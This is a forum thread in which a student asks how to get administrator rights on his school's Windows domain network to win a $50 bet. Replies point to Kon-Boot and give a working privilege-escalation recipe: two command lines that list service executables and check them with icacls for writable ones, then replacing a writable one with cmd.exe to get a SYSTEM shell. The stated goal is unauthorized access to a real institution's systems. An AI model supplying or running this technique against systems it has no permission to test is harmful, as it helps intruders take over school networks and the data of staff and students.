I am fairly new to the world of hacking however i am more then keen to learn !
So i've taken on my School IT admin. The bet is 50$ if i can get my Account admin.
I've tested all open ports found the admin printers ect ect. I've also found how to edit files on other users. Using powershell. (you can start powershell from a batch file.) The command looks a little like this:
pushd \\fileserver\users\username\
Right ! ermm so my question is how would i go about getting admin rights?
it's running windows 2008 not sure of the service pack.
It's a domain setup example All computers login with user and pass (maybe if it's possible to find some admin users)
i've checked all the other fileservers and they need admin rights.
I've also tried to connect to a ftp server it says that the port is unreachable aka not open. The same thing happens with i try to ping a website.
So maybe it's possible to run a ftp server on port 80 ? with the web traffic ? or am i just being a complete noob. xD Sorry !
Any input would be amazing ! Thanks alot
6 Responses
Uhhhh if you are hacking the school computers as windows you COULD just live boot KonBoot wich bypasses the passwords alltogether.
I should of said in the post but we have no physical contact with the computers but ill do more research into konboot sounds interesting.
Thanks mate.
So I've looked up konboot. I get the feeling this wont help as the school is running on a domain login :p
There's a method that exploits misconfigured service directories. Services are usually ran as the SYSTEM account, which is why only admins should have access to service executables. However, sometimes they are put in directories to which all users have access. If you replace the executable with, say, cmd.exe, you can get a SYSTEM level shell.
These two commands come in handy while looking for vulnerable services:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> a.txt
This one outputs all service executables to a text file.
for /f eol^=^"^ delims^=^" %a in (a.txt) do cmd.exe /c icacls "%a" >> b.txt
Thia one runs the icacls command to check file permissions. Scan b.txt for "Users:(F)" or "Everyone:(F)" or similar strings. If you see one, replace the executable with cmd.exe. After a reboot, you should have a shell open.
Very interseting i'll have a look into that today. I did find a Fileserver that start on login. For example
there is a batch script there that deletes all wma. .bats ect ect
that's not the problem.. Just think it has admin rights however i cannot edit this fileserver so maybe it's possbile to do some sort of process highjack ? i'll get back to y ou on the System exploit
thanks for the reply.
you dont have any whatsoever physical contact to the machine?
I do in the sence of mouse and key board but all the hardware is locked in a cupboard
Share Your Thoughts